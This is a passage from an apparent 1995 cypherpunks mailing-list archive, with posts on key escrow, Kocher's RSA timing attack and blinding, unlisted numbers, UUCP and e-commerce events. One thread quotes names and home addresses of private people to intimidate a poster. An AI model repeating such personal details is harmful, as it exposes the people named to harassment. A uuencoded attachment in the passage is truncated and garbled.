reason that market access controls like these break down is that they are dependent on every seller on earth giving up the profit involved in selling to you. Sellers are different. You can usually find one who doesn't check ID well or is in another jurisdiction (in the case of non physical transactions). A new effect is the spread of libertarian (small L) political ideologies which means that a growing group of market participants are philosophically opposed to traditional control regimes. Eg C2.ORG. A final problem for control freaks is that Friction Free Capitalism is eating away at the traditional market institutions that have grown up during the control era. Thus if traditional banking, telephony, and electricity distribution are wiped out by new forms of competitive business activity it is hard for regulatory agencies to extend their traditional controls to the new entities. Budget restraints play a part as does inertia. All of this is before the new market players deploy anti control technologies and procedures. They are in business because they can displace traditional quasi-monopoly institutions and often see government as just another competitor to be bypassed. DCF From gimonca at mirage.skypoint.com Fri Dec 15 05:43:12 1995 From: gimonca at mirage.skypoint.com (Charles Gimon) Date: Fri, 15 Dec 1995 21:43:12 +0800 Subject: ADDRESS DATABASE? [getting noisy] Message-ID: Forwarded message: [Sandfort summer picnic invitation list deleted] > > > This took about a minute using a shabby consumer-level DB. > *Now* do you get it? > > > Hieronymous > Well, "information wants to be free", and all that stuff... From frogfarm at yakko.cs.wmich.edu Fri Dec 15 06:57:41 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Fri, 15 Dec 1995 22:57:41 +0800 Subject: ADDRESS DATABASE? In-Reply-To: <199512150303.VAA10066@cdale1.midwest.net> Message-ID: <199512151411.JAA24231@yakko.cs.wmich.edu> andr0id at midwest.net writes: > > > The best way to circumvent something like the below occurring is to have > >your home phone number listed under a pseudonym with no street address listed > >and block out *69 and caller-id. If some entity wants your phone number, > >give them your business number. > > Another "best way" is to make all calls that you want to be personal with > a cellular phone. Most cellular systems don't send ANI and do not provide > any type of billing information to the phone company. The number is also by > nature unlisted and the only way to get it is by you or the cellular > carrier. If the cellular carrier gives your number out without your > permision or a court order they are in BIG trouble.. My untrained brain sees two problems with this: 1) Cellular systems are inherently less secure than standard telephones, as anyone who can afford a decent scanner can listen to your conversations at will. 2) You're relying on someone other than yourself to protect your security, which is always a bad idea. Cellular carriers, Ma Bell, anyone. Does anyone on this list really believe that representatives of these organizations would think twice about bending over and spewing out everything they know about you? They do it all the time, without your permission and without valid court orders. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona Hate, hate your enemies save, save your friends find, find your place I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right. From jps at monad.semcor.com Fri Dec 15 07:10:08 1995 From: jps at monad.semcor.com (Jack P. Starrantino) Date: Fri, 15 Dec 1995 23:10:08 +0800 Subject: Secured RM ? (source) In-Reply-To: Message-ID: <9512151425.AA07871@monad.semcor.com> I don't think this will work. When you > if ( (Pfp = fopen(Pfilename, "wb") ) == NULL) the file will be truncated. Subsequent writes could be anywhere on the platter; you're building a new file. I think you can work this way if you open the file for read/write access, although I'd be more inclined to take the file name into the directory and then walk the inodes. jps -- Jack P. Starrantino (215) 674-0200 (voice) SEMCOR, Inc. (215) 443-0474 (fax) 65 West Street Road jps at semcor.com Suite C-100 Warminster, PA 18974 From liberty at gate.net Fri Dec 15 07:15:59 1995 From: liberty at gate.net (Jim Ray) Date: Fri, 15 Dec 1995 23:15:59 +0800 Subject: "Strongly Voluntary" Key Escrow Message-ID: <199512151412.JAA30648@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Tim wrote: >All of these are "voluntary" key escrow (though I hate that misuse of the >word "escrow") [...] I do too, and I hate it enough that I must (again) object to any use of it where there is not a _NEUTRAL_, _THIRD_ party involved, as explained before on the list (at length) by me, James A. Donald, and many others. [So, why are you *again* consuming bandwidth on this subject, Jim?] Because I love the English language, and because I am quite aware that those who define the terms end up winning the debate, every time. I do not want the word "escrow" in a key context to go the way of the word "voluntary" in an income-tax context (or the word "take" in an enviro- law context). The government has snaked in a Newspeak meaning for the latter two terms, but I hope that cypherpunks will only use the term "GAK" when talking to or about the government. Failure to do so will not only put "our side" in a worse public-relations position, it may (in the future) do violence to the English language. While I enjoyed Tim & Uni's "voluntary" sarcasm, I think we have enough material for *ample* humor without adding even more words to the Newspeak roll. >there are few circumstances where I think "government certification" "Government Key Certification" might be an OK compromise-term compared to "key escrow," but we should [IMNSHO] continue to stick to "GAK." As you know, I prefered the term "FUCKED," but now we must be "decent" in our communications. >is even useful, let alone necessary. I can think of only two, but perhaps there are others: 1. Government employees (but only while working on government time). 2. Convicted felons (I wouldn't include the failed drugwar's felons). >Any scheme in which the government interjects itself in what would not >normally involve them can hardly be said to be strictly voluntary. Indeed, but we have already "lost" the word "voluntary" to Newspeak, which is why it's necessary to qualify it with words like "strictly" and "strongly." JMR - ---------------------------------------------------------------------- Regards, Jim Ray http://www.shopmiami.com/prs/jimray "Thank God we don't get all the government we pay for." -- Will Rogers [Said back when we paid for (and got) a _lot_ less government.] - ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Public Key id. # E9BD6D35 IANAL - ----------------------------------------------------------------------- Help Phil! e-mail zldf at clark.net or http://www.netresponse.com/zldf _______________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh. iQCVAwUBMNF6U21lp8bpvW01AQGhXwP/ZDmtjY77AnAnnmddpd/rX93E4nGm7JBg 8KXyM7TGiiifpPfLRLJR3LncS0OE7V6CIcaq6zSox+qK97SfNZJhwP+GUIMegChJ WiqIaU5el2x6n0KeD/Km4loXMah6o4q4RJyVyo/M3uLlvYsBUyi9i4MQHy6fHpdU BSBnPIz0j0w= =9K29 -----END PGP SIGNATURE----- From ljo at ausys.se Fri Dec 15 08:28:39 1995 From: ljo at ausys.se (Johansson Lars) Date: Sat, 16 Dec 1995 00:28:39 +0800 Subject: Blinding against Kocher's timing at Message-ID: <95Dec15.155851gmt+0100.53765@void.ausys.se> Hal wrote: >From: ljo at ausys.se (Johansson Lars) >> Does anyone know whether David Chaum's patent on >> blind digital signatures extends to this application? [Parts omitted] >It's conceivable that Kocher's blinding would be a patentable technique >in itself, and not impossible that he has already applied for a patent >before publishing. Probably he would have said so if that were his >intention, though. I just found this at RSA:s home page: >Q: Has RSA been "broken"? > > A: No. The attack that Paul Kocher describes is academically interesting, but it is >easy to defend systems against his attack using a technique called > "blinding", developed by Dr. Ron Rivest of RSA. ^^^^^^^^^^^^^^^^^^^^^^^^^ When did Dr. Rivest develop this "blinding" technique? Was it pre or post Chaum? Perhaps Rivest himself have applied for this patent. More info from RSA:s home page: > Another way is to use a technique called "blinding", in which a random number > is introduced into the decryption process, making it impossible to get any useful >data out of timing these transactions. > >so instead of doing the usual RSA decryption: > > m = c^d mod n > >we perform: > > m = r^-1*(c*r^e)^d mod n > >where r is a random number, and is its inverse. /Lars From hfinney at shell.portal.com Fri Dec 15 08:29:40 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 16 Dec 1995 00:29:40 +0800 Subject: kocher's timing attack Message-ID: <199512151457.GAA27245@jobe.shell.portal.com> From: dreschs at austnsc.tandem.com (Sten Drescher) > On Firewalls, "Jonathan M. Bresler" said: > JMB> After > JMB> several large key signing parties hundreds of known ciphertexts > JMB> could have been generated using Alice's key--each one a public key > JMB> of someone else. over several years it piles up. the known > JMB> ciphertexts can be tested/analyzed to yield Alice's secret key. > JMB> ouch. ;/ > > Are you sure about this? It would seem that the same principle > would then apply to signed messages as well, and I find it a bit hard to > believe that signing messages would make ones key pair vulnerable. As Kocher's paper implies, the known ciphertext attack is a TIMING attack. Simply accumulating known text/signature pairs as you would have after a "key signing party" does not help. You must know exactly how much time each signature took. Hal From hfinney at shell.portal.com Fri Dec 15 10:01:58 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 16 Dec 1995 02:01:58 +0800 Subject: Kocher's RSA attack Message-ID: <199512151506.HAA27760@jobe.shell.portal.com> From: Derek Atkins > I must disagree, software implementations of RSA can and probably do > allow the timing attacks. It all depends on the modexp implementation. > Most implementations that I know of, when performing an x^y mod n will > require a squarings and b multiplies, where a is the number of bits in > y and b is the number of 1-bits in y. This is not enough - Paul Kocher's attack depends on the individual modular multiplies taking different times. (Actually, that is for his attack on Diffie Hellman. The RSA CRT decryption attack uses a completely different principle, but I guess we are ignoring that for now.) The fact that timing a modular exponentiation would give information about the density of 1 bits in the exponent is not particularly new or surprising, as has been mentioned here. What is new is that you can actually figure out the specific exponent value. But that requires variable-timing modmult, not just variable-timing modexp. PGP is somewhat unique in having a multiplicity of modmult algorithms which can be selected at compile time. I am not sure which of these might be variable time and which might be fixed. The most likely place for time variation IMO is in the modular reduction rather than the multiply; the multiply is generally deterministic with no variation due to data values (although as was pointed out here, on some processors a hardware multiply instruction may take variable time depending on its inputs). Some modular reductions involve trial division to some extent or other, with different numbers of iterations possible depending on certain (maybe unusual) values. However I believe at least one of the PGP modular reductions consists of multiplying by the reciprocal of the modulus, followed by a fixed shift, and this one should be constant time on a machine which has constant-time multiplies and shifts. (This is just going from memory, I haven't looked at the algorithm in several years.) Hal From rah at shipwright.com Fri Dec 15 10:05:01 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 16 Dec 1995 02:05:01 +0800 Subject: DCSB: Future Scenarios for e$ Message-ID: -----BEGIN PGP SIGNED MESSAGE----- The Digital Commerce Society of Boston (Formerly The Boston Society for Digital Commerce) Presents Art Hutchinson and John Kelly Northeast Consulting Resources Inc., (NCRI) "Future Scenarios for e$" Tuesday, January 2, 1995 12 - 2 PM The Downtown Harvard Club of Boston One Federal Street, Boston, MA Mr. Hutchinson is a Senior Consultant at Northeast Consulting Resources, Inc. (NCRI). His primary area of focus is NCRI's Information Commerce practice. He has advised clients on the application of different approaches to, and technologies for managing (and getting paid for) digital intellectual property on the Internet, the World Wide Web, and private/hybrid networks. Mr. Hutchinson is an active member of the Electronic Rights Management Group of the Information Industry Association, and a founding member of the Digital Commerce Society of Boston. He speaks regularly at conferences on the topic of rights management in cyberspace He is a principal contributor to NCRI's Future Mapping(r) conferences, including "The Future of Information Commerce" and "The Great Infrastructure Debate"(r). Prior to joining NCRI, Mr. Hutchinson was Director of Consulting Services at BIS Strategic Decisions. Prior to BIS, Mr. Hutchinson managed the Distribution Channels Information Service at International Data Corp. (IDC). Mr. Kelly, a Senior Consultant at Northeast Consulting Resources, Inc. (NCRI), has specialized in designing group planning and decision making activities that help teams clarify their strategic options. He also analyzes new applications in multimedia training and groupware. He is one of the leaders of the Mapping the Future of Information Commerce seminars. Mr. Kelly has led seminars on strategic planning and Future Mapping for a large international oil company, a Fortune 100 diversified manufacturing company, a leading computer hardware and systems company, and numerous software and telecommunications companies. He has contributed to the development of databases of critical events that help companies chart their future business opportunities in the areas of computing, communications, and interactive multimedia. Before joining NCRI, Mr. Kelly served as an Associate Editor and consultant for the Seybold Office Computing Group. Mr. Kelly also worked for the Information Systems Group at Lotus Development Corporation and was the Director of Interactive Technology Projects at the WGBH Educational Foundation. Prior to that, Mr. Kelly was Manager of the Seminar Division at Information Mapping, Inc. and later served as a consultant to IMI. Art says: >Art Hutchinson and John Kelly of Northeast Consulting Resources, Inc. (NCRI) >will facilitate an interactive exercise that helps to paint a picture of the >group's collective thinking about future events and milestones >in the development of electronic commerce. Specifically, we will be culling >through the last year of posts to www-buyinfo, e-payment, and various other >mailing lists, as well as our own database of 17,000 "events" used in >previous scenario planning conferences. From this, we will be create a set >of about 40 potential future events which - depending upon whether they >happen or not - will drive the digital commerce arena in varying directions. > > >Everyone at the lunch will be given an opportunity to 'vote' on and discuss >with their peers the likelihood (or un-likelihood) of these events happening >within a particular time frame. After the 'voting', we will lead a >discussion of what the results might mean, and how some things that this >group believes correspond to what other corporate and industry groups have >said in the recent past in voting on some of the same events. Suggestions >for controversial, interesting, watershed events that might happen in the >digital commerce arena over the next 3-5 years are welcome. Please e-mail >them directly to Art Hutchinson at This meeting of the Boston Society for Digital Commerce will be held on Tuesday, January 2, 1995 from 12pm - 2pm at the Downtown Branch of the Harvard Club of Boston, One Federal Street. The price for lunch is $27.50. This price includes lunch, room rental, and the speaker's lunch. ;-). The Harvard Club *does* have a jacket and tie dress code. We need to receive a company check, or money order, (or if we *really* know you, a personal check) payable to "The Harvard Club of Boston", by Saturday, December 30 (that's two weeks from this Saturday), or you won't be on the list for lunch. Checks payable to anyone else but The Harvard Club of Boston will have to be sent back. Checks should be sent to Robert Hettinga, c/o The Shipwright Development Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they must be made payable to "The Harvard Club of Boston". If anyone has questions, or has a problem with these arrangements (We've had to work with a few glacial A/P departments ourselves, for instance), please let us know via e-mail, and we'll see if we can work something out. Planned speakers for the following few months are: February Fred Hapgood Freelance Author March Glenda Barnes X.9 Electronic Commerce Security Group April Donald Eastlake CyberCash May Perry Metzger Security Consultant and Cypherpunk June Dan Shutzer FSTC We are actively searching for future speakers. If you are in Boston on the first Tuesday of the month, and you would like to make a presentation to the Society, please send e-mail to the DCSB Program Commmittee, care of Robert Hettinga, rah at shipwright.com . For more information about the Boston Society for Digital Commerce, send "info dcsb" in the body of a message to majordomo at ai.mit.edu . If you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a message to majordomo at ai.mit.edu . Looking forward to seeing you there! Cheers, Bob Hettinga Moderator, The Digital Commerce Society of Boston -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNGdJPgyLN8bw6ZVAQGSgQP/Q5PfwoevxNRBaC1B6dUaIDl07bhGTpSm v9pYx3kuHTEc0Mei3Zzxj4G/yaSGFHoOuz8rslxsKBIrsLeB0Xc7gehs8OjgXsuU fcR6gvT4mlY9Mvs8E9MaeTlTlHAz5R38g1lv1ST4Xti7kBQ4l9EEErTjPOM4oHy/ 6kglzZsCSM4= =QJbV -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From drcharpe at hamlet.uncg.edu Fri Dec 15 10:06:34 1995 From: drcharpe at hamlet.uncg.edu (DANIEL CHARPENTIER) Date: Sat, 16 Dec 1995 02:06:34 +0800 Subject: Algorithims In-Reply-To: <9511158190.AA819065181@wmcmail.wmc.ac.uk> Message-ID: For information on Enigma try "APPLIED CRYPTOGRAPHY" by Bruce Schneier page 11 and 364. Page 11 gives a brief summary of it and provides some info and other material covering it. Page 364 does the same. In case you do not have access to the book ( which of course is a sin ) here are some of the references. "THE CODEBREAKERS" by D. Kahn 1983 "CRYPTANALYSIS of the HAGLEN CRYPTOGRAPH" by W.G. Barker 1977 "THE BLACK CHAMBER: A COLUMN; HOW THE BRITISH BROKE ENIGMA" by C.A. Deavours Crptologia, v.4,n.3,Jul 1980,pp 129-132 From bdavis at thepoint.net Fri Dec 15 10:11:18 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 16 Dec 1995 02:11:18 +0800 Subject: [NOISY] Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy In-Reply-To: Message-ID: On Fri, 15 Dec 1995, Rich Graves wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > My friend Clark wrote: > > >Thanks (belatedly) for posting this, Russell. Who was it said, "Follow the > >money." > > I believe that was Woodward & Bernstein. They were referring to some > right-wing wackos who had flagrantly broken the law investigating their > political opposition, then very sloppily tried to cover it up. Woodward & > Bernstein brought down a President. I think they're cool (though they seem > to have rested on their laurels, and their subsequent work is less > impressive). > Actually, I think it was Woodward's source, "Deep Throat," who said "Follow the money." EBD From sandfort at crl.com Fri Dec 15 10:13:52 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Sat, 16 Dec 1995 02:13:52 +0800 Subject: ADDRESS DATABASE? In-Reply-To: <199512150601.HAA14657@utopia.hacktic.nl> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Fri, 15 Dec 1995, Anonymous wrote: > You don't get it, do you? > > > Sandfort A & K > Irvine, CA 92714 > . . . > Sandfort Weldon W > 407 Rock St > Dardanelle, AR 72834-3402 > > > This took about a minute using a shabby consumer-level DB. > *Now* do you get it? Nope. MY name isn't on your list. In addition, my home phone number is unlisted--therefore contracturally unavailable for resale. *Now* do you get it? S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jamesd at echeque.com Fri Dec 15 10:16:23 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 16 Dec 1995 02:16:23 +0800 Subject: Web O Trust, active attacks against same, etc. AGAIN. (was: Usability of Cryptography (was Re: More FUD from First Virtual) ) Message-ID: <199512140616.WAA28005@blob.best.net> At 01:39 PM 12/13/95 -0700, Bryce wrote: > >-----BEGIN PGP SIGNED MESSAGE----- > > An entity calling itself "James A. Donald" >allegedly wrote: >> >> Web of trust is a mess because it attempts to link keys to >> physical people, which in general cannot be done. > ******************************* > > >Do you wish to substantiate this rather brazen assertion? >I am very sure that PGP public key 0xCC56B2E9 belongs to my >housemate Sebastian Kuzminsky . Is >there some reason why I should doubt this belief? No, but there is some reason you should gain familiarity with the english language If I had intended to say "generally cannot be done" I would have said "generally cannot be done" instead of saying "in general cannot be done" --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From blancw at accessone.com Fri Dec 15 10:23:01 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Sat, 16 Dec 1995 02:23:01 +0800 Subject: [NOISE] The Enquirer Message-ID: <9512140621.AA27244@pulm1.accessone.com> Now, THAT's what I call "The News Update". This is the kind of encapsulated [NOISE] we could all stand to hear! ha-ha-ha .. Blanc From mdiehl at dttus.com Fri Dec 15 10:44:29 1995 From: mdiehl at dttus.com (Martin Diehl) Date: Sat, 16 Dec 1995 02:44:29 +0800 Subject: e-mail forwarding, for-pay remailers Message-ID: <9511158190.AA819055487@cc2.dttus.com> Obviously, we need a certificate authority that will digitally sign personal identification documents (Name, address, photo (digitized), date of birth, etc.) Martin G. Diehl ______________________________ Forward Header __________________________________ Subject: Re: e-mail forwarding, for-pay remailers Author: "E. ALLEN SMITH" at Internet-USA Date: 12/13/95 5:33 PM From: IN%"gbroiles at darkwing.uoregon.edu" "Greg Broiles" 13-DEC-1995 03:40:50.49 >I don't have much faith that the people who are currently doing the DNS for my domain name (goldenbear.com) are going to do anything about the current bouncing-messages phenomenon anytime soon, so I'm looking into other ways to get & send E-mail [snip] netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage or forwarding for people; [snip] There's one problem with this in regards to the "no necessary connection," and that 's the governmental requirement for mail forwarding. MBE and any legal other one will want to see at least two forms of ID including one photo, and have a form that they fill out using that and send to the local post office. Anyone have a way around this problem? -Allen The following is an attached File item from cc:Mail. It contains information that had to be encoded to ensure successful transmission through various mail systems. To decode the file use the UUDECODE program. --------------------------------- Cut Here --------------------------------- begin 644 RFC822.TXT M4F5C96EV960Z(&9R;VT at 9V%T93$N9'1T=7,N8V]M(&)Y(&-C,BYD='1U7!H97)P=6YK2!T;V%D+F-O;2!I9"!! M03$R,#$R.R!7960L(#$S($1E8R`Y-2`Q,SHR,SHR,2!04U0-"E)E8V5I=F5D M.B!F7!H97)P=6YK On Mon, 11 Dec 1995, Michael Coates wrote: > PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT" > Netscape Communications has awarded two software sleuths $1,000 each for > finding security gaps in its Netscape Navigator 2.0 software. The company > also awarded gifts to 50 other contestants in its "Bugs Bounty" program for > identifying non-security problems. (Wall Street Journal 11 Dec 95 B7) Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000 from Netscape for finding the HUGE security flaws in Netscape's existing product line?? I can't remember whether they got anything or not ... (Sorry, but I've been away from the list. One of those, "fate of the Free World hangs in the balance" thingies ... ;-) Have Netscape and AT&T shown some holiday goodwill, or are they still engaged in their felonious freeloading foolishness? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From llurch at networking.stanford.edu Fri Dec 15 11:00:13 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Sat, 16 Dec 1995 03:00:13 +0800 Subject: [NOISY] Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy In-Reply-To: <9512150734.AA0051@cnct-gw.new-york.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- My friend Clark wrote: >Thanks (belatedly) for posting this, Russell. Who was it said, "Follow the >money." I believe that was Woodward & Bernstein. They were referring to some right-wing wackos who had flagrantly broken the law investigating their political opposition, then very sloppily tried to cover it up. Woodward & Bernstein brought down a President. I think they're cool (though they seem to have rested on their laurels, and their subsequent work is less impressive). Anyway, Russell, did you ever get a followup to this? I don't see a response on CDT's Web page, so I assume the funding issue never hit the "mainstream." I haven't been following the relevant lists and newsgroups. While Leahy, the medical privacy bill's chief sponsor, is generally regarded as a White Hat (he led the opposition to Exon), I do have serious concerns about the issues that have been raised. I'm aware of the CDT's break with the EFF and have questioned their "maturity" before. It's possible they were "co-opted" or naive. But at least the CDT cites its sources (like the full text of the bill and testimony), and allows financial disclosure. This is not true of some less reputable fringe organizations and publications. As for Clark's implied threats (I'm not entirely sure how much to read into them, probably not much), I am of course aware of the vulnerability of my personal records, and live my life accordingly. This includes monitoring fraudulent requests for credit and medical records and being completely honest with friends and employers. This is the "other" reason I'm on cypherpunks. Would that we would all do the same. As for Clark knowing that I'm an274074 at anon.penet.fi, well DUH. I've posted that several times. It's advertised as a means for people uninformed about remailers and such to send me anonymous tips. As Woody Allen once said, be fruitful and multiply. - -rich -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNEtGo3DXUbM57SdAQEkGAP/d7pefEMU3gEMfjZnAz+vOhm4SmEbwVho HlzGG8JKsie+3htqg3K04lZLse1RmcAgRoa71YaO0uaN6J0xmQA2Bd7f2Y/4kWwP aetQsGtresxvTIq7tg+AZ6MNTADalVvojfKh2MeeVcEV3izMfZOqvd/9X77YMRdC d4vBQwl1PuQ= =ayJ1 -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Fri Dec 15 12:00:16 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 16 Dec 1995 04:00:16 +0800 Subject: And the standard continues to lower... Message-ID: <199512151846.KAA14526@jobe.shell.portal.com> On Fri, 15 Dec 1995, Peter Trei wrote: > This guy's home page is a hoot - he's into UFO contacts and dolphin > communication. > > After writing to him and getting back a description of his system, it's > clear that he's clueless. He seems to think that info sent to a vendor > using his system can't be sorted out from the gazillion other packets > on the Net. > > I described to him sniffer attacks, subverted routers, etal, and > reccomended some basic reading (Cheswick & Bellovin, Is this the two partners in crime from AT&T?? Cheswick & Bellovin?? I think that they're probably not all that reputable (or knowledgable) from what I've seen of their writings and contributions to the AT&T DSRP (Data Security Response Program) mailing list. (If they are the same people, I mean ...) > Kaufmann, Perlman, & Speciner, and Schneier). He said he'd > look into it. (Yes, I know there's plenty of other attacks, such as > OSPF spoofing, but I didn't describe them). > > I think we can educate this guy. Plenty of educating can probably be done, I think. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From droelke at rdxsunhost.aud.alcatel.com Fri Dec 15 12:07:51 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Sat, 16 Dec 1995 04:07:51 +0800 Subject: Encrypted telnet... Message-ID: <9512151848.AA20590@spirit.aud.alcatel.com> I am looking for an encrypted telnet (or rlogin/etc) package that supports a Windoze client. It looks like all the normal ones that I can find (SSH, SRA telnet, SSLtelnet, etc) are just under Unixoids. Don't get me wrong - I would prefer to use Unix, but I am headed off to locations, where I know all I'll have access to is Windows, with a PPP stack to some ISP. I'ld write it myself, - pasteing different packages together, but I need it working in a day or two. Can anyone help me here? Thanks, Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From jlasser at rwd.goucher.edu Fri Dec 15 12:11:37 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Sat, 16 Dec 1995 04:11:37 +0800 Subject: Pornographic stories In-Reply-To: Message-ID: On Thu, 14 Dec 1995, Dr. Dimitri Vulis wrote: > > In fact I've suggested to several people that we start > > a dial-up uucp revival for this and related reasons. (If > > the number of users/webpages and the bandwidth usage continues > > to increase at the recent rates -- without a corresponding > > improvement in the infrastructure we'll probably all want to > > go back to uucp for mail and news anyway. Old fashioned dial-up > > may be faster than T1 access in a few years and direct point-to- > > point uucp over ISDN is probably faster already. [...] > > Anyone else want to participate in the great '90's > > uucp revival? I'm in Santa Clara and could use > > some feeds and some help with the setup. > > I'm all for it. My site is connected to the rest of the world via dial-up > UUCP, I haven't touched the setup in 5 years, and am not planning to. > > It might be interesting to have a variation of dial-up UUCP where site 1 > passes encrypted stuff to site 2 and doesn't quite know what site 3 they're > supposed to go on to. Sort of like the remailers with encryption. This definitely seems like a good idea to me, especially with the encrypted link. Is the encrypted link software written, or need we hack a few perl scripts? The mechanics seem simple enough.... ------------------------------------------------------------------------------ JonJon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From nobody at REPLAY.COM Fri Dec 15 12:40:47 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 16 Dec 1995 04:40:47 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512151901.UAA10562@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Sandfort-8802 unit: >> This took about a minute using a shabby consumer-level DB. >> *Now* do you get it? ^^^^^^^^^^^^^^^^^^^^^^^^ > > hint hint hint hint < >Nope. MY name isn't on your list. In addition, my home phone >number is unlisted--therefore contracturally unavailable for >resale. *Now* do you get it? It's kind of cool how much faith you have in the idea that your number is unlisted, considering the fact that you started this thread by griping that someone had the goods on you. The reason you were "taken aback" is because your beliefs don't correspond to reality -- "cognitive dissonance," in the lingo. H -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMNHGg73g0mNE55u1AQEfcwH9HPcXAyMQPv9ZNQ2MxvBHfTtsIfqw15zG n7S7yppwR2AsayZgSZQFIDoee0tLRBqEvPFhxNqnOiPCht5PK01YGA== =gIKw -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Fri Dec 15 12:49:12 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 16 Dec 1995 04:49:12 +0800 Subject: .PWL spin Message-ID: <199512151829.KAA13449@jobe.shell.portal.com> On Sat, 9 Dec 1995, Joel McNamara wrote: > One system administrator said the problem would have a greater effect on > less-secure environments, such as universities and other institutions, > than on corporations. I didn't quite understand the "corporate speak" here. It sounds like something coming from Bosnia or something. It's Greek to me. What would make a University less secure than a corporation?? Universities (at least the ones, I've checked) have entire departments and theoreticians devoted to Computers ... companies usually don't. I'd think that Universities are much, much more secure environments than corporations are. Doesn't Microsoft know this?? Or is this unique to Seattle?? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From trei at process.com Fri Dec 15 12:58:42 1995 From: trei at process.com (Peter Trei) Date: Sat, 16 Dec 1995 04:58:42 +0800 Subject: And the standard continues to lower... Message-ID: <9512151643.AA12546@toad.com> At 05:17 PM 12/13/95 -0600, you wrote: >Dr. Brian L. Crissey includes in his .sig, courtesy of cactus at hks.net >>[ much WRT YetAnotherSecureInternetCreditCardPaymentSystem(*tm) deleted ] >> ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128 >> (503)-434-2426 brianc at linfield.edu >> Professionals built the Titanic, amateurs built the Ark... > >However, the Ark was *designed* by GOD (if you believe the story). Can Dr. >Brian L. Crissey say the same thing about his payment system? This guy's home page is a hoot - he's into UFO contacts and dolphin communication. After writing to him and getting back a description of his system, it's clear that he's clueless. He seems to think that info sent to a vendor using his system can't be sorted out from the gazillion other packets on the Net. I described to him sniffer attacks, subverted routers, etal, and reccomended some basic reading (Cheswick & Bellovin, Kaufmann, Perlman, & Speciner, and Schneier). He said he'd look into it. (Yes, I know there's plenty of other attacks, such as OSPF spoofing, but I didn't describe them). I think we can educate this guy. speaking only for myself, Peter Trei From jlasser at rwd.goucher.edu Fri Dec 15 13:00:43 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Sat, 16 Dec 1995 05:00:43 +0800 Subject: [NOISY] Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy In-Reply-To: Message-ID: On Fri, 15 Dec 1995, Rich Graves wrote: > >Thanks (belatedly) for posting this, Russell. Who was it said, "Follow the > >money." > > I believe that was Woodward & Bernstein. They were referring to some > right-wing wackos who had flagrantly broken the law investigating their > political opposition, then very sloppily tried to cover it up. Woodward & > Bernstein brought down a President. I think they're cool (though they seem > to have rested on their laurels, and their subsequent work is less > impressive). Actually, W&B attributed the line to "Deep Throat," their (note:cypherpunks relevance) anonymous source... Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From andr0id at midwest.net Fri Dec 15 13:06:00 1995 From: andr0id at midwest.net (andr0id at midwest.net) Date: Sat, 16 Dec 